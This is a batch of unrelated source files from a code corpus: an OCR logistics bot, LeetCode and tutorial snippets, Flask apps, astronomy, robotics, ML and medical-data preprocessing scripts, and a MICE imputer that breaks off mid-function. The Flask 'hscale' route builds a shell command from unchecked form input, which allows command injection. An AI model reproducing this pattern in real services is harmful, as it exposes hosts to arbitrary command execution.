\"DELIVERY ORDER IMAGE DATA CONTAINS TRAILER_PREFIX: \" + data)\n\t\t\t\t\tif 
self.botstrings.has_numbers(data):\n\t\t\t\t\t\tprint(self.log + \"DELIVERY ORDER IMAGE DATA CONTAINS TRAILER_PREFIX AND HAS NUMBERS: \" + data)\n\t\t\t\t\t\ttrailer_number.append(data)\n\t\t\t\t\t\ttrailer_number_found = True\n\t\t\t\t\t\tcontinue\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(self.log + \"DELIVERY ORDER IMAGE DATA CONTAINS TRAILER_PREFIX BUT NO NUMBERS: \" + data)\n\t\t\t\t\n\t\t\t\t# CHECK FOR CONTRACT NUMBER\n\t\t\t\tif contains_contract_prefix:\n\t\t\t\t\tprint(self.log + \"DELIVERY ORDER IMAGE DATA CONTAINS CONTRACT PREFIX: \" + data)\n\t\t\t\t\tprint(self.log + \"DELIVERY ORDER IMAGE DATA CONTAINS CONTRACT NO: \" + contract_no)\n\t\t\t\t\tcontinue\n\t\t\t\telif data in customer_project_list.customer_project_list:\n\t\t\t\t\tprint (self.log + \"DATA EXISTS IN CUSTOMER PROJECT LIST. CONTRACT NO: \" + data)\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\ttop_result = customer_project_list.search_project_by_name(data)\n\t\t\t\t\tif top_result != None:\n\t\t\t\t\t\tproject_name_results.append(top_result)\n\t\t\tmessenger.send_chat_action(destination_id, \"typing\")\n\t\t\tproject_name_results = sorted(project_name_results, key= lambda x: x[1], reverse=True)\n\t\t\tprint(project_name_results[0])\n\n\t\t\tif trailer_number_found:\n\t\t\t\tfor trailer_candidate in trailer_number:\n\t\t\t\t\tif all(x.isalnum() for x in trailer_candidate):\n\t\t\t\t\t\ttrailer_choice = trailer_candidate\n\t\t\t\t\t\tbreak\n\t\t\tfor number in list_of_numbers:\n\t\t\t\tif self.botstrings.is_load_no(number):\n\t\t\t\t\tload_no = number\n\t\t\t\t\tbreak\n\n\t\t\tnew_intent = UserIntent(\"trailer_action\", \"\")\n\t\t\tnew_intent.action_type = \"park\"\n\t\t\tnew_intent.trailer_unit = trailer_choice\n\t\t\tif project_name_results[0][0] != None:\n\t\t\t\tnew_intent.customer_project = project_name_results[0][2]\n\t\t\tif load_no != \"\":\n\t\t\t\tnew_intent.load_no = load_no\n\t\t\ttarget_user.user_intent = new_intent\n\t\t\t# message_string = \"Trailer no: \" + trailer_choice + \"\\n\" + \"Project name: \" + project_name_results[0][0]\n\t\t\t# reply_keyboard = self.keyboardmanager.build_reply_keyboard([[\"Yes\"]])\n\t\t\t# messenger.send_message(destination_id, message_string, reply_keyboard)\n\n\t\t\tbot_understanding, new_inline_keyboard_items = target_user.user_intent.bot_understanding()\n\t\t\tif new_inline_keyboard_items != None:\n\t\t\t\tnew_main_keyboard = self.keyboardmanager.build_reply_keyboard(new_inline_keyboard_items, True)\n\t\t\telse:\n\t\t\t\tnew_main_keyboard = self.keyboardmanager.remove_reply_keyboard(True)\n\t\t\tmessenger.send_message(destination_id, bot_understanding, new_main_keyboard)\n\t\telse:\n\t\t\tprint(self.log + \"IMAGE DATA DOES NOT COME FROM A DIGITAL ORDER\")\n\t\t\tmessenger.send_message(destination_id, \"Is it a trailer plate? 
Hmm...\", None)\n\t\t\tmessenger.send_chat_action(destination_id, \"typing\")\n\t\t\tsearch_string = \"\"\n\t\t\tfor data in image_data:\n\t\t\t\tprint(self.log + \"IMAGE DATA CONTAINS \" + data)\n\t\t\t\tsearch_string_item = data\n\t\t\t\tcontains_prefix, prefix = self.botstrings.contains_trailer_prefix(data)\n\t\t\t\tif contains_prefix:\n\t\t\t\t\tprint(self.log + \"IMAGE DATA CONTAINS TRAILER PREFIX: \" + data)\n\t\t\t\t\tsearch_string_item = prefix\n\t\t\t\t\ttrailer_number_found = True\n\t\t\t\tsearch_string += search_string_item\n\t\t\tprint(self.log + \"IMAGE DATA FROM TRAILER: \" + search_string)\n\t\t\tsearch_string.lstrip()\n\t\t\talphabet = ''.join(i for i in search_string if not i.isdigit())\n\t\t\t\n\t\t\tprint(self.log + \"IMAGE DATA CONTAINS TRAILER_PREFIX: \" + alphabet)\n\t\t\ttrailer_number = search_string\n\n\n\t\tif trailer_number_found:\n\t\t\tprint (self.log + \"TRAILER UNIT IS FOUND\")\n\t\t\tprint (trailer_number)\n\t\telse:\n\t\t\tprint (self.log + \"TRAILER UNIT IS NOT FOUND\")\n\n\n# {\"ParsedResults\":\n# \t[\n# \t\t{\"TextOverlay\":\n# \t\t\t{\"Lines\":[],\"HasOverlay\":false,\"Message\":\"Text overlay is not provided as it is not requested\"\n# \t\t\t},\n# \t\t\"FileParseExitCode\":1,\n# \t\t\"ParsedText\":\"TRC \\r\\n2245T \\r\\n\",\"ErrorMessage\":\"\",\"ErrorDetails\":\"\"}],\"OCRExitCode\":1,\"IsErroredOnProcessing\":false,\"ErrorMessage\":null,\"ErrorDetails\":null,\"ProcessingTimeInMilliseconds\":\"310\",\"SearchablePDFURL\":\"Searchable PDF not generated as it was not requested.\"}\n","sub_path":"support_classes/userimageparser.py","file_name":"userimageparser.py","file_ext":"py","file_size_in_byte":7021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"502605875","text":"# https://leetcode.com/problems/meeting-rooms-ii/\n\n# Given an array of meeting time intervals consisting of start and end times [[s1,e1],[s2,e2],...] (si < ei),\n# find the minimum number of conference rooms required.\n\n# For example,\n#\n# Given [[0, 30],[5, 10],[15, 20]],\n#\n# return 2.\n\n# Definition for an interval.\n# class Interval(object):\n# def __init__(self, s=0, e=0):\n# self.start = s\n# self.end = e\n\n\n\n# Definition for an interval.\n# class Interval(object):\n# def __init__(self, s=0, e=0):\n# self.start = s\n# self.end = e\n\n\n\nclass Solution(object):\n def minMeetingRooms(self, intervals):\n \"\"\"\n :type intervals: List[Interval]\n :rtype: int\n \"\"\"\n import heapq\n heap = []\n num = 0\n\n heapq.heapify(heap)\n\n intervals.sort(lambda x, y: x.start - y.start)\n\n for i in range(len(intervals)):\n if len(heap) == 0:\n heapq.heappush(heap, intervals[i].end)\n num += 1\n continue\n\n if heap[0] <= intervals[i].start:\n heapq.heappop(heap)\n heapq.heappush(heap, intervals[i].end)\n else:\n heapq.heappush(heap, intervals[i].end)\n num += 1\n\n return num\n\n\n\n","sub_path":"253_meeting_rooms_ii.py","file_name":"253_meeting_rooms_ii.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"436117004","text":"import time\nfrom flask import Flask, request, abort\nfrom datetime import datetime\n\n\napp = Flask(__name__)\ndb = [\n {\n 'name': 'Nick',\n 'text': 'Hello!',\n 'time': time.time()\n },\n {\n 'name': 'Ivan',\n 'text': 'Hello, Nick!',\n 'time': time.time()\n }\n]\n\n\n@app.route(\"/\")\ndef hello():\n return \"Hello, Messenger!\"\n\n\n@app.route(\"/status\")\ndef status():\n my_status = {\n 'status': True,\n 'name': \"My Messenger\",\n 'time': str(datetime.now()),\n 'number_of_messages': len(db),\n 'number_of_users': len(set(i['name'] for i in db))\n }\n return my_status\n\n\n@app.route(\"/send\", methods=['POST'])\ndef send_message():\n data = request.json\n if not isinstance(data, dict):\n return abort(400)\n if 'name' not in data or 'text' not in data:\n return abort(400)\n name = data['name']\n text = data['text']\n if not isinstance(name, str) \\\n or not isinstance(text, str):\n return abort(400)\n if name == '' or text == '':\n return abort(400)\n db.append({\n 'name': name,\n 'text': text,\n 'time': time.time()\n })\n if text == '/help':\n db.append({\n 'name': 'BOT',\n 'text': 'Ha-ha, looser!',\n 'time': time.time()\n })\n return {'OK': True}\n\n\n@app.route(\"/messages\")\ndef get_messages():\n try:\n after = float(request.args['after'])\n except ValueError:\n abort(400)\n messages = []\n for message in db:\n if message['time'] > after:\n messages.append(message)\n return {'messages': messages[:50]}\n\n\napp.run()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"194826019","text":"import sys\nimport os\nimport glob\nimport numpy as np\nfrom astropy.io import fits\n\n# this function will create a linearely binned version\n# of a particular spectrum\nfrom srebin import linlin\n\n\"\"\"Add rebinned sky_subtracted to the x_multi*.fits\"\"\"\n\nff = glob.glob( \"../xsky/2019????v???/exp0?/x_*.fits\")\n\npattern = \"/work/03946/hetdex/maverick/red1/reductions/{}/virus/virus0000{}/{}/virus/{}\"\n\ndef get_rebinned(fin ,extensions=['spectrum', 'sky_spectrum', 'fiber_to_fiber'], start = 3494.74, step = 1.9858398, stop = 5500.):\n\n\t\"\"\" #print(\"Reading {}\".format(fin))\n hdu = fits.open(fin)\n\n wl = hdu['wavelength'].data\n\n #start,stop = 3503.9716796, 5396.477\n N = int( np.ceil( (stop - start)/step ) )\n\n rebinned = {}\n\t\"\"\"\n\n\t#start,stop = 3503.9716796, 5396.477\n\tN = int( np.ceil( (stop - start)/step ) )\n\n\t#print(\"Reading {}\".format(fin))\n\thdu = fits.open(fin)\n\n\twl = hdu['wavelength'].data\n\n\t#start,stop = 3503.9716796, 5396.477\n\trebinned = {}\n\tfor ext in extensions:\n\t\t#for j in range(hdu[ext].data.shape[1]): # This might cause big errors...\n\t\t#isnull = np.unique(hdu[ext].data[:,j])\n\t\t#isnull = isnull[np.where(isnull != 0)]\n\t\t#if len(isnull)==0:\n\t\t# hdu[ext].data[:, j] = np.ones(hdu[ext].data.shape[0])*np.nan\n\t\t#print(\"Rebinning {}\".format(ext))\n\n\t\tnew = np.zeros([wl.shape[0], N])\n\t\thduextdata = hdu[ext].data\n\t\tfor i in range(wl.shape[0]):\n\t\t\tw = wl[i,:]\n\t\t\tf = hduextdata[i,:]\n\t\t\tstart = start\n\t\t\tstep = step\n\t\t\tstop = stop\n\t\t\tlw, lf = linlin(w, f, start, step, stop, dowarn=False)\n\t\t\t#lw = np.arange(start, stop, step)\n\t\t\t#lf = model_resampled_10A = spectres(lw, w, f)\n\n\t\t\t# hack as they may not all necessareyly have the same length\n\t\t\tnew[i,:min(N, len(lf))] = lf[:min(N, len(lf))]\n\n\t\trebinned[ext] = new\n\treturn lw, rebinned\n\nfor fin in ff[:3]:\n\n\tnight = fin.split(\"/\")[2][:-4]\n\tshot = fin.split(\"/\")[2][-3:]\n\texp = fin.split(\"/\")[3]\n\tname = fin.split(\"/\")[-1][2:]\n\n\tnewfin = pattern.format(night, shot, exp, name)\n\t\n\thdu = fits.open(fin)\n\ttry:\n\t\tskysub = hdu[\"sky_subtracted_rb\"].data\n\t\tfiber_to_fiber = hdu[\"fiber_to_fiber_rb\"].data\n\t\tprint(\"Found sky subtracted and fiber to fiber rb in \"+fin)\n\t\thdu.close()\n\texcept KeyError:\n\t\tww, rb = get_rebinned(newfin, extensions=[\"sky_subtracted\",\"fiber_to_fiber\"])\n\t\thdu.append(fits.ImageHDU(rb[\"sky_subtracted\"], name=\"sky_subtracted_rb\"))\n\t\thdu.append(fits.ImageHDU(rb[\"fiber_to_fiber\"], name=\"fiber_to_fiber_rb\"))\n\t\thdu.writeto(fin, overwrite=True)\n\t\tprint(\"Wrote to \"+fin)\n","sub_path":"add_skysub.py","file_name":"add_skysub.py","file_ext":"py","file_size_in_byte":2453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"102332782","text":"import os\nimport json\nfrom nanome.util import Logs\n\ndefault_json_string = \"\"\"{\n \"host\":\"127.0.0.1\",\n \"port\":8888,\n \"key\":\"nts_key\",\n \"plugin_files_path\":\"~/Documents/nanome-plugins\"\n}\"\"\"\n\ndefault_json = json.loads(default_json_string)\n\n\ndef _setup_file():\n s = \"/\"\n\n home = os.getenv('APPDATA')\n if home is None:\n home = os.getenv('HOME')\n directory = home + s + \".nanome_lib\"\n config = directory + s + \"config.txt\"\n\n if not os.path.isdir(directory):\n try:\n os.mkdir(directory)\n except:\n return False\n if not os.path.isfile(config):\n try:\n Logs.message(\"Creating config file with path \" + config)\n _setup_clean_config(config)\n except:\n return False\n return config\n\n\ndef _setup_clean_config(config_path):\n with open(config_path, \"w\") as file:\n json.dump(default_json, file)\n\n\ndef fetch(key):\n \"\"\"\n | Fetch a configuration entry from your nanome configuration.\n | Built-in keys are:\n | host - your NTS server address\n | port - your NTS server port\n | key - your NTS key file or string\n | plugin_files_path - where your plugins will store files\n\n :param key: The key of the config value to fetch\n :type key: :class:`str`\n \"\"\"\n if config_path:\n try:\n with open(config_path, \"r\") as file:\n config_json = json.load(file)\n return config_json[key]\n except KeyError:\n value = default_json[key]\n set(key, value)\n return value\n else:\n return default_json[key]\n\n\ndef set(key, value):\n \"\"\"\n | Set a configuration entry in your nanome configuration.\n | Built-in keys are host, port, key and plugin_files_path.\n | Default values are 127.0.0.1, 8888, nts_key and ~/Documents/nanome-plugins\n\n :param key: The key of the config value to set\n :type key: :class:`str`\n :param value: The value to set the config item to\n :type value: :class:`str`\n \"\"\"\n if config_path:\n with open(config_path, \"r\") as file:\n config_json = json.load(file)\n config_json[key] = value\n with open(config_path, \"w\") as file:\n json.dump(config_json, file)\n return True\n return False\n\n\nconfig_path = _setup_file()\n","sub_path":"nanome/util/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"167634844","text":"#!/usr/bin/env python\n\"\"\" Constants\nCourse: EE 106A, Fall 2016\nWritten by: Valmik Prabhu, 12/5/16\nUsed by: EE106A Project, 12/5/16\n\nThis code contains constants for the UR5:\njoint lengths\njoint axes\ninitial joint positions\n\n\nSources:\nJoint lengths from:\nhttp://www.zacobria.com/temp/ur5_dimensions.jpg\n\nJoint axes and positions from testing, with help from:\n\"Analytic Inverse Kinematics for the Universal Robots UR-5/UR-10 Arms\", by Kelsey P. Hawkins, December 7, 2013\n\n\"\"\"\n\nimport numpy as np\nimport math\n\n## Angle restrictions and tolerance\n# Meant to keep the robot from a singularity and to restrict number of solutions\n\n\ntolerance = -1 # safety factor in degrees\n\n# Angle restrictions in degrees\ntheta3min = 0\ntheta3max = 180\ntheta2min = -120\ntheta2max = 0\n\n## UR5 Data ************************************\n\n# scale should be 1000 if in mm instead of m\nscale = 1\n\nl_1 = .0892*scale\nl_2 = .425*scale\nl_3 = .392*scale\nl_4 = .1093*scale\nl_5 = .0948*scale\nl_6 = .0825*scale\n\nomega1 = np.array([0, 0, 1])\nq1 = np.array([0, 0, 0])\nomega2 = np.array([0, -1, 0])\nq2 = np.array([0, 0, l_1])\nomega3 = np.array([0, -1, 0])\nq3 = np.array([-l_2, 0, l_1])\nomega4 = np.array([0, -1, 0])\nq4 = np.array([-l_2 - l_3, 0, l_1])\n\nqe = np.array([-l_2 - l_3 - l_5, -l_4, l_1 - l_6])\n\n# Initial angle\nrx = math.pi\nry = 0\nrz = math.pi/2\n\n\ntheta4offset = math.pi/2\ntheta5 = -math.pi/2\ntheta6 = 0\n\n\n# HW3 Numbers for testing *****************************\n# omega1 = np.array([0, 0, 1])\n# q1 = np.array([0, 0, 0])\n# omega2 = np.array([-1, 0, 0])\n# q2 = np.array([0, 0, 5])\n# omega3 = np.array([-1, 0, 0])\n# q3 = np.array([0, 4, 5])\n# omega4 = np.array([0, 0, 1])\n# q4 = np.array([0, 7, 5])\n# omega5 = np.array([-1, 0, 0])\n# q5 = np.array([0, 7, 5])\n# omega6 = np.array([0, 1, 0])\n# q6 = np.array([0, 7, 5])\n# qe = np.array([0, 9, 5])","sub_path":"team13project/src/savethezumy/src/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"372754729","text":"fruit = {\"orange\": \"a sweet, orange, citrus fruit\",\n \"apple\": \"good for making cider\",\n \"lemon\": \"a sour, yellow citrus fruit\",\n \"grape\": \"a small, sweet fruit growing in bunches\",\n \"lime\": \"a sour, green citrus fruit\"}\n\nprint(fruit)\n\nveg = {\"cabbage\" : \"every child's favourite\",\n \"sprouts\": \"mmmmm, lovely\",\n \"spinach\": \"can I have some more fruit, please\"}\n\nprint(veg)\n\n# =================================\n# Combining the 2 dictionaries\n# dictionary does not return anything\n# 1st example is adding fruit dictionary to veg\n# 2nd example is adding veg dictionary to fruit\n# =================================\n# veg.update(fruit)\n# print(\"fruit dictionary added to veg dictionary: \\n {}\".format(veg))\n#\n# fruit.update(veg)\n# print(\"veg dictionary added to fruit dictionary: \\n {}\".format(fruit))\n\n\n# ====================================\n# Create a new dictionary by combining both fruit and veg dictionary\n# without changing the original dictionary\n# use copy command and then update command\n# ====================================\n\nnice_and_nasty=fruit.copy()\nnice_and_nasty.update(veg)\nprint(\"Nice And Nasty Dictionary: \\n {}\".format(nice_and_nasty))","sub_path":"Dictionaries_And_Sets/Additional_Methods_In_Dictionary.py","file_name":"Additional_Methods_In_Dictionary.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"520894501","text":"from app import app\nfrom app import execmd\nfrom flask import request, flash, redirect, url_for, render_template\nimport commands\n\n@app.route('/hscale', methods = ['POST'])\ndef hscale():\n vcontainer = request.form['container']\n vresource = request.form['resource']\n vvalue = request.form['value']\n ret = \"Value Error\"\n\n if vresource == \"cpu\":\n try:\n vnumber = int(vvalue)\n except ValueError:\n return 'Value Error'\n vnumber = 1024 * vnumber / 100\n ret = commands.getoutput(execmd + \"update --cpu-shares \" + str(vnumber) + \" \" + vcontainer) \n\n if vresource == \"memory\":\n ret = commands.getoutput(execmd + \"update --memory \" + vvalue + \" \" + vcontainer) \n\n return render_template(\"index.html\",\n text = ret\n )\n\n\n\n","sub_path":"app/hScale.py","file_name":"hScale.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"478554419","text":"\"\"\"\r\n\n\nIn **Mirror Cipher** , encoding is done by switching message characters with\nits mirror opposite character of the key.\n\nCreate a function that takes two arguments; a `message` and an optional `key`,\nand return the **encoded message**.\n\nThere are some variations on the rules of encipherment. One version of the\ncipher rules are outlined below:\n\n message = \"Mubashir Hassan\"\n key = \"edabitisamazing\"\n \n mirror_cipher(message, key) ➞ \"tuzishar hissid\"\n\n **Step 1:** Replace all characters of the given message with mirror character\nin the key:\n\n M = t, # 't' is mirror character of 'M'\n u = u, # 'u' is not part of the key\n b = z, # 'z' is mirror character of 'b'\n a = i, and so on ...\n\n **Step 2:** Return encoded message in lower case:\n\n \"tuzishar hissid\"\n\nIf optional `key` is not given, consider the whole alphabet as a default (i.e.\n`key` = **\"abc..z\"** ).\n\n### Examples\n\n mirror_cipher(\"Mubashir Hassan\", \"edabitisamazing\") ➞ \"tuzishar hissid\"\n \n mirror_cipher(\"Matt MacPherson\") ➞ \"nzgg nzxksvihlm\"\n \n mirror_cipher(\"Airforce is best\", \"pilot\") ➞ \"aorfirce os besp\"\n\n### Notes\n\nIgnore case of message and key, (e.g. \"M\" = \"m\").\n\n\"\"\"\r\n\nfrom string import ascii_lowercase as al\ndef mirror_cipher(message, key=al):\n message, key = message.lower(), key.lower()\n result = \"\"\n for letter in message:\n if not letter in key:\n result += letter\n else:\n index = key.find(letter)\n mirror = key[-index-1]\n result += mirror\n return result\n\n","sub_path":"auLEvdvBT5PRnALvn_11.py","file_name":"auLEvdvBT5PRnALvn_11.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"559170830","text":"\"\"\"\nThis code takes the DATASET_PATH path and MODEL_PATH to predict the\nexpected index, the model must be provided with the correct data.\n\n\"\"\"\n\n# TODO calculate confusion matrix metrics\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.metrics import confusion_matrix, ConfusionMatrixDisplay, accuracy_score, \\\n precision_score, recall_score, f1_score, classification_report\nimport seaborn as sns\nfrom tensorflow.keras.models import load_model\nimport matplotlib.pyplot as plt\nfrom CNN import load_data\nfrom CNN import predict\nfrom CNN import get_mappings\nfrom Notes_to_Frequency import notes_to_frequency\nfrom Notes_to_Frequency import notes_to_frequency_6\nfrom Notes_to_Frequency import notes_to_frequency_limited\n\nMODEL_DATASET_PATH = \"Dataset_JSON_Files/Simulated_Dataset_Matlab_12frets_1.json\"\nDATASET_PATH = \"Dataset_JSON_Files/Only_G4_Recorded_1.json\" # data used for predictions\nMODEL_PATH = \"CNN_Model_Files/CNN_Model_Simulated_Dataset_Matlab_12frets_1.h5\"\nRESULTS_PATH = \"Results/CNN_Results/\"\nMODEL_NAME = \"Simulated_Dataset_Matlab_12frets_1\"\nDATASET_NAME = \"Only_G4_Recorded_1\"\nPLOT_TITLE = \"Only_G4_Recorded_1\" # Dataset name to be used in graph titles\nLABELS = get_mappings(MODEL_DATASET_PATH)\n\n\ndef prepare_data(dataset):\n # load dataset\n X, y = load_data(dataset)\n print(\"initial shape of X = {}\".format(X.shape))\n\n # CNN expects 3D array inputs are only 2D\n X = X[..., np.newaxis] # 4D array -> [num_samples, number of time bins, mfcc_coefficients, channel]\n print(\"returned shape of X = {}\".format(X.shape))\n print(\"returned shape of y = {}\".format(y.shape))\n\n return X, y\n\n\nif __name__ == \"__main__\":\n # load model\n model = load_model(MODEL_PATH)\n\n # summarize model.\n model.summary()\n\n # load data\n X, y = prepare_data(DATASET_PATH)\n\n # make prediction on a sample\n #predicted_note = []\n predicted_index = []\n prediction = pd.DataFrame(columns=LABELS)\n #print(LABELS)\n #prediction.columns = list(LABELS)\n\n for i in range(len(X)):\n index, pred = predict(model, X[i], y[i])\n #predicted_note.append(note)\n predicted_index.append(index)\n prediction.loc[len(prediction.index)] = pred[0]\n\n #print(y)\n # print(predicted_index)\n # print full dataframe\n with pd.option_context('display.max_rows', None,\n 'display.max_columns', None,\n 'display.precision', 3,\n ):\n print(prediction)\n\n # save results as csv\n prediction = prediction.round(2) # round to 2 dp\n description = prediction.describe()\n description = description.round(2) # round to 2 dp\n prediction.to_csv(RESULTS_PATH + \"Prediction_\" + MODEL_NAME + \"_\" + DATASET_NAME + \".csv\")\n description.to_csv(RESULTS_PATH + \"Description_\" + MODEL_NAME + \"_\"+ DATASET_NAME + \".csv\")\n\n print(prediction.describe())\n\n\n \"\"\"\n cm = confusion_matrix(y, predicted_index)\n # tn, fp, fn, tp = confusion_matrix(y, predicted_index).ravel()\n # print(\"tn: {} fp: {} fn: {} tp: {}\".format(tn, fp, fn, tp))\n\n # calculate metrics\n report = classification_report(y, predicted_index, zero_division=0)\n accuracy = accuracy_score(y, predicted_index)\n precision_macro = precision_score(y, predicted_index, average=\"macro\", zero_division=0)\n precision_micro = precision_score(y, predicted_index, average=\"micro\", zero_division=0)\n recall_macro = recall_score(y, predicted_index, average=\"macro\", zero_division=0)\n recall_micro = recall_score(y, predicted_index, average=\"micro\", zero_division=0)\n f1_score_macro = f1_score(y, 
predicted_index, average=\"macro\", zero_division=0)\n f1_score_micro = f1_score(y, predicted_index, average=\"micro\", zero_division=0)\n\n # calculate metrics from confusion matrix\n true_pos = np.diag(cm) # true positives are the diagonal of cm\n false_pos = np.sum(cm, axis=0) - true_pos\n false_neg = np.sum(cm, axis=1) - true_pos\n\n\n # python return 0 divide by 0 as NAN\n #precision = np.sum(np.nan_to_num(true_pos / (true_pos + false_pos)))\n #recall = np.sum(np.nan_to_num(true_pos / (true_pos + false_neg)))\n #specificity = np.sum(np.nan_to_num(true_neg / (true_neg + false_pos)))\n print(\"Accuracy: \", accuracy)\n print(\"Precsion macro: \", precision_macro)\n print(\"Precsion micro: \", precision_micro)\n print(\"Recall macro: \", recall_macro)\n print(\"Recall micro: \", recall_micro)\n print(\"F1 score macro: \", f1_score_macro)\n print(\"F1 score micro: \", f1_score_micro)\n print(report)\n\n\n #print(\"Specificity: \", specificity)\n\n # plot confusion matrix\n disp = ConfusionMatrixDisplay(confusion_matrix=cm)\n disp.plot()\n plt.title(PLOT_TITLE + \"Confusion Matrix\")\n plt.xlabel('Predicted')\n plt.ylabel('True')\n plt.show()\n\n # plot graph\n xaxis = []\n xaxis.extend(range(0, len(X)))\n plt.scatter(xaxis, predicted_note)\n plt.title(\"Predicted Note of OnlyA4Recorded using \" + PLOT_TITLE)\n plt.xlabel('Note Sample')\n plt.ylabel('Predicted Note')\n plt.show()\n \"\"\"\n\n\n","sub_path":"Neural Networks/Audio/CNN_Predict.py","file_name":"CNN_Predict.py","file_ext":"py","file_size_in_byte":5065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"355997403","text":"import os\r\nfrom subprocess import call\r\n\r\nbase = \"../../../mimic-iii-clinical-database-1.4/\"\r\ninput_data = \"cut1000\"\r\nsubject_data = \"output_subjects_1000\"\r\nepisodes_data = \"output_episodes_1000\"\r\nlistfiles_data = \"output_listfiles_1000\"\r\n\r\n# works in windows but not mac:\r\n# os.system(\"extract_subjects.py \" + base + input_data + \" \" + subject_data)\r\n# os.system(\"validate_events.py \" + subject_data)\r\n# os.system(\"create_readmission.py \" + subject_data + \" \" + \"--custom-model model-1\")\r\nos.system(\"extract_episodes_from_subjects.py \" + subject_data)\r\nos.system(\"create_readmission_data.py \" + subject_data + \" \" + episodes_data)\r\nos.system(\"split_train_val_test.py \" + episodes_data + \" \" + listfiles_data)\r\n\r\n# call(['python3', 'extract_subjects.py', base + input_data, subject_data])\r\n# call(['python3', 'validate_events.py', subject_data])\r\n# call(['python3', 'create_readmission.py', subject_data])\r\n# call(['python3', 'extract_episodes_from_subjects.py', subject_data])\r\n# call(['python3', 'create_readmission_data.py', subject_data, episodes_data])\r\n# call(['python3', 'split_train_val_test.py', episodes_data, listfiles_data])\r\n\r\n\r\n","sub_path":"mimic3-readmission/scripts/OF_preprocess.py","file_name":"OF_preprocess.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"264617048","text":"import pandas as pd\nfrom fancyimpute import mice\n\nfrom . import missing_value_pred as mvp\nfrom d3m.primitive_interfaces.transformer import TransformerPrimitiveBase\nfrom d3m.primitive_interfaces.base import CallResult\nimport stopit\nimport math\n\nfrom d3m import container\nfrom d3m.metadata import hyperparams\nfrom d3m.metadata.hyperparams import UniformBool, Hyperparams\n\nfrom . import config\n\nInput = container.DataFrame\nOutput = container.DataFrame\n\nclass MiceHyperparameter(Hyperparams):\n verbose = UniformBool(default=False,\n semantic_types=['http://schema.org/Boolean',\n 'https://metadata.datadrivendiscovery.org/types/ControlParameter'])\n\nclass MICE(TransformerPrimitiveBase[Input, Output, MiceHyperparameter]):\n \"\"\"\n Impute the missing value using MICE.\n This class is a wrapper from fancyimpute-mice\n\n Parameters:\n ----------\n verbose: bool\n Control the verbosity\n \"\"\"\n\n metadata = hyperparams.base.PrimitiveMetadata({\n ### Required\n \"id\": \"3f72646a-6d70-3b65-ab42-f6a41552cecb\",\n \"version\": config.VERSION,\n \"name\": \"DSBox MICE Imputer\",\n \"description\": \"Impute missing values using the MICE algorithm\",\n \"python_path\": \"d3m.primitives.data_cleaning.MiceImputation.DSBOX\",\n \"primitive_family\": \"DATA_CLEANING\",\n \"algorithm_types\": [ \"IMPUTATION\" ],\n \"source\": {\n \"name\": config.D3M_PERFORMER_TEAM,\n \"contact\": config.D3M_CONTACT,\n \"uris\": [ config.REPOSITORY ]\n },\n ### Automatically generated\n # \"primitive_code\"\n # \"original_python_path\"\n # \"schema\"\n # \"structural_type\"\n ### Optional\n \"keywords\": [ \"preprocessing\", \"imputation\" ],\n \"installation\": [ config.INSTALLATION ],\n \"location_uris\": [],\n \"precondition\": [ hyperparams.base.PrimitivePrecondition.NO_CATEGORICAL_VALUES ],\n # \"effects\": [ hyperparams.base.PrimitiveEffects.NO_MISSING_VALUES ],\n \"hyperparms_to_tune\": []\n })\n\n\n def __init__(self, *, hyperparams: MiceHyperparameter) -> None:\n super().__init__(hyperparams=hyperparams)\n # All primitives must define these attributes\n self.hyperparams = hyperparams\n\n # All other attributes must be private with leading underscore\n self._train_x = None\n self._has_finished = False\n self._iterations_done = False\n self._verbose = hyperparams['verbose'] if hyperparams else False\n\n\n def produce(self, *, inputs: Input, timeout: float = None, iterations: int = None) -> CallResult[Output]:\n \"\"\"\n precond: run fit() before\n\n to complete the data, based on the learned parameters, support:\n -> greedy search\n\n also support the untrainable methods:\n -> iteratively regression\n -> other\n\n Parameters:\n ----------\n data: pandas dataframe\n label: pandas series, used for the evaluation of imputation\n\n TODO:\n ----------\n 1. 
add evaluation part for __simpleImpute()\n\n \"\"\"\n\n if (timeout is None):\n timeout = 2**31-1\n if (iterations is None):\n iterations = 100 # default value for mice\n\n if isinstance(inputs, pd.DataFrame):\n data = inputs.copy()\n else:\n data = inputs[0].copy()\n # record keys:\n keys = data.keys()\n index = data.index\n\n # setup the timeout\n with stopit.ThreadingTimeout(timeout) as to_ctx_mrg:\n assert to_ctx_mrg.state == to_ctx_mrg.EXECUTING\n\n # start completing data...\n if self._verbose: print(\"=========> impute by fancyimpute-mice:\")\n data_clean = self.__mice(data, iterations)\n\n value = None\n if to_ctx_mrg.state == to_ctx_mrg.EXECUTED:\n self._has_finished = True\n self._iterations_done = True\n value =pd.DataFrame(data_clean, index, keys)\n elif to_ctx_mrg.state == to_ctx_mrg.TIMED_OUT:\n self._has_finished = False\n self._iterations_done = False\n return CallResult(value, self._has_finished, self._iterations_done)\n\n\n\n #============================================ core function ============================================\n def __mice(self, test_data, 